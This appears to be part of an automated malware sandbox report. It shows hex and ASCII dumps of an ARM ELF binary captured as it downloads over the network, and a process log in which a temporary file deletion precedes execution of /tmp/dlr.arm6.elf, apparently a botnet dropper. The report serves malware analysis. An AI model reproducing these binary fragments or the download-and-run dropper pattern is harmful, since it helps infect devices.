                      Data Raw: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 02 00 28 00 01 00 00 00 54 81 00 00 34 00 00 00 78 29 01 00 02 00 00 04 34 00 20 00 03 00 28 00 0c 00 0b 00 01 00 00 00 00 00 00 00 00 80 00 00 00 80 00 00 fc 25 01 00 fc 25 01 00 05 00 00 00 00 80 00 00 01 00 00 00 00 26 01 00 00 26 02 00 fc 25 02 00 08 03 00 00 90 d6 00 00 06 00 00 00 00 80 00 00 51 e5 74 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 04 00 00 00 0d c0 a0 e1 f0 df 2d e9 04 b0 4c e2 f0 af 1b e9 00 00 00 00 00 00 00 00 00 00 00 00 10 40 2d e9 2c 40 9f e5 00 30 d4 e5 00 00 53 e3 06 00 00 1a 20 30 9f e5 00 00 53 e3 1c 00 9f 15 0f e0 a0 11 13 ff 2f 11 01 30 a0 e3 00 30 c4 e5 10 40 bd e8 1e ff 2f e1 04 29 02 00 00 00 00 00 fc 25 02 00 04 e0 2d e5 40 30 9f e5 00 00 53 e3 04 d0 4d e2 38 00 9f 15 38 10 9f 15 0f e0 a0 11 13 ff 2f 11 30 00 9f e5 00 30 90 e5 00 00 53 e3 03 00 00 0a 24 30 9f e5 00 00 53 e3 0f e0 a0 11 13 ff 2f 11 04 d0 8d e2 04 e0 9d e4 1e ff 2f e1 00 00 00 00 fc 25 02 00 08 29 02 00 08 26 02 00 00 00 [TRUNCATED]
                      Data Ascii: ELF(T4x)4 (%%&&%Qtd-L@-,@0S 0S/00@/)%-@0SM88/00S$0S//%)& ---0/*G-p `p00PPPUG/p@P$-
                      Dec 30, 2024 02:17:53.360759020 CET1236INData Raw: 04 00 a0 e1 dc 2c 00 eb da 18 00 eb aa 17 00 eb 6c 30 9f e5 00 00 d3 e5 00 00 50 e3 0e 00 00 0a 60 30 9f e5 00 10 93 e5 00 c0 91 e5 04 30 dc e5 07 00 53 e1 05 20 a0 11 04 00 00 1a 08 00 00 ea 02 c1 91 e7 04 30 dc e5 07 00 53 e1 04 00 00 0a 01 20
                      Data Ascii: ,l0P`00S 0S R, 0/ )$)P@-@0S0R^@/P
                      Dec 30, 2024 02:17:53.360773087 CET1236INData Raw: 00 20 84 e5 04 30 c4 e5 01 11 a0 e1 38 27 00 eb 00 30 d5 e5 00 20 a0 e1 03 41 80 e7 08 10 a0 e3 07 30 83 e0 07 00 a0 e1 00 30 c5 e5 00 20 86 e5 e2 26 00 eb 00 10 d5 e5 44 21 9f e5 00 40 a0 e1 0f 30 a0 e3 07 10 81 e0 00 00 96 e5 00 20 84 e5 04 30
                      Data Ascii: 08'0 A00 &D!@0 0%'0 A00 & @0 0'0 A00 & @0 0&
                      Dec 30, 2024 02:17:53.360790968 CET1236INData Raw: f0 4f 2d e9 5c d0 4d e2 12 70 8d e2 00 10 8d e5 00 60 a0 e1 70 12 9f e5 02 80 a0 e1 07 00 a0 e1 36 20 a0 e3 03 a0 a0 e1 ac 20 00 eb 6d 28 00 eb 13 00 cd e5 6b 28 00 eb 14 00 cd e5 69 28 00 eb 15 00 cd e5 67 28 00 eb 16 00 cd e5 65 28 00 eb 17 00
                      Data Ascii: O-\Mp`p6 m(k(i(g(e(c(a(_(]( @Z(@6T%%H@D 0P 0, (0
                      Dec 30, 2024 02:17:53.360802889 CET1236INData Raw: 01 90 89 e2 18 b0 8b e2 18 10 8d e2 10 20 a0 e3 08 00 8c e7 3a 00 00 0a 00 30 a0 e3 0c c0 9d e5 1c 30 8d e5 02 30 a0 e3 b8 31 cd e1 ba c1 cd e1 1e 21 00 eb 14 30 d6 e5 1f 00 53 e3 1e 00 00 9a 14 20 9d e5 06 10 a0 e1 08 00 92 e7 10 20 a0 e3 24 21
                      Data Ascii: :0001!0S $!0Y00)H@Dl$ !44 Q`0y`@s$,!$<$,0!"< 4
                      Dec 30, 2024 02:17:53.360816002 CET956INData Raw: 09 e0 8e e0 01 39 a0 e3 10 c0 a0 e3 05 10 a0 e1 0b 00 a0 e1 0c 20 9d e5 00 e0 8d e5 04 c0 8d e5 55 20 00 eb 34 30 9d e5 01 00 83 e2 08 00 50 e1 34 00 8d e5 c0 ff ff aa c4 ff ff ea 0b 00 a0 e1 4a 15 00 eb 3c d0 8d e2 f0 4f bd e8 1e ff 2f e1 10 40
                      Data Ascii: 9 U 40P4J<O/@\40A$,,$<$,0,"< 44<q0E8 0CR>,xO-
                      Dec 30, 2024 02:17:53.360829115 CET1236INData Raw: 08 30 c4 e5 40 30 a0 13 54 50 9d e5 b6 30 c4 11 2f 30 a0 e3 09 30 c4 e5 14 20 84 e2 08 30 a0 e3 b4 50 c4 e1 b2 80 c4 e1 b2 30 c2 e1 20 30 9d e5 18 20 d4 e5 0c 30 84 e5 b0 20 c2 e3 40 20 82 e3 09 10 81 e0 10 10 91 e5 18 20 c4 e5 18 30 d4 e5 0a 30
                      Data Ascii: 0@0TP0/00 0P0 0 0 @ 0000(P P0, 0@ 0 0`D;@Q0000\0,`L @H0Tp 0\@<@<P@@
                      Dec 30, 2024 02:17:53.360847950 CET248INData Raw: b2 30 c5 11 d4 ff ff 1a 51 0c 00 eb 04 30 9d e5 09 50 83 e0 b2 00 c5 e1 cf ff ff ea 00 60 a0 e3 07 00 56 e1 52 1e a0 e3 64 00 a0 e3 fa ff ff aa 06 51 9a e7 7d 0c 00 eb 00 48 a0 e1 24 48 a0 e1 05 00 a0 e1 04 10 a0 e1 9c 0c 00 eb 06 01 98 e7 05 10
                      Data Ascii: 0Q0P`VRdQ}H$H 9`@8$,!$<$,0!"< 44<0$O/O-4MpP`!!H
                      Dec 30, 2024 02:17:53.360858917 CET1236INData Raw: 01 40 44 e2 06 10 a0 e1 07 20 a0 e3 04 30 a0 e1 00 80 a0 e1 05 00 a0 e1 fa f8 ff eb 06 10 a0 e1 06 20 a0 e3 04 30 a0 e1 00 b0 a0 e1 05 00 a0 e1 f4 f8 ff eb 06 10 a0 e1 00 98 a0 e1 00 20 a0 e3 02 3c a0 e3 05 00 a0 e1 ee f8 ff eb 01 20 a0 e3 02 30
                      Data Ascii: @D 0 0 < 0,X )Z )<$` LW@(4#8",0 0 0$0020
                      Dec 30, 2024 02:17:53.360872984 CET1236INData Raw: 01 10 a0 e3 06 00 80 e2 cb 1f 00 eb 00 30 d0 e5 b0 30 c3 e3 40 30 83 e3 00 30 c0 e5 00 20 d0 e5 2c 30 9d e5 0a 20 c2 e3 00 50 a0 e1 00 00 53 e3 10 00 96 e5 05 20 82 e3 06 30 a0 e3 00 20 c5 e5 09 30 c5 e5 10 00 85 e5 20 00 9d e5 40 10 a0 13 01 00
                      Data Ascii: 00@00 ,0 PS 0 0 @(< p @000 000 000 0 P 0 0@0QDL
                      Dec 30, 2024 02:17:53.367002964 CET1236INData Raw: b0 1b 00 eb 01 00 70 e3 51 01 00 0a 40 20 9d e5 00 00 5b e3 02 08 a0 e1 60 80 9d 05 ff 40 04 e2 20 38 a0 e1 64 40 8d e5 50 30 8d e5 28 a0 88 02 e2 00 00 0a 48 10 9d e5 01 80 08 e2 01 10 01 e2 30 c0 9d e5 1c 10 8d e5 24 80 8d e5 44 20 9d e5 5c 80
                      Data Ascii: pQ@ [`@ 8d@P0(H0$D \P,`p 0`,`(p 8`4ph0 ( pl +l0,S


                      System Behavior

                      Start time (UTC):01:17:45
                      Start date (UTC):30/12/2024
                      Path:/usr/bin/dash
                      Arguments:-
                      File size:129816 bytes
                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                      Start time (UTC):01:17:45
                      Start date (UTC):30/12/2024
                      Path:/usr/bin/rm
                      Arguments:rm -f /tmp/tmp.7ovVSDsvBA /tmp/tmp.I0M6MszF3i /tmp/tmp.Qu4gWkzb61
                      File size:72056 bytes
                      MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                      Start time (UTC):01:17:45
                      Start date (UTC):30/12/2024
                      Path:/usr/bin/dash
                      Arguments:-
                      File size:129816 bytes
                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                      Start time (UTC):01:17:45
                      Start date (UTC):30/12/2024
                      Path:/usr/bin/rm
                      Arguments:rm -f /tmp/tmp.7ovVSDsvBA /tmp/tmp.I0M6MszF3i /tmp/tmp.Qu4gWkzb61
                      File size:72056 bytes
                      MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                      Start time (UTC):01:17:51
                      Start date (UTC):30/12/2024
                      Path:/tmp/dlr.arm6.elf
                      Arguments:/tmp/dlr.arm6.elf
                      File size:4956856 bytes
                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1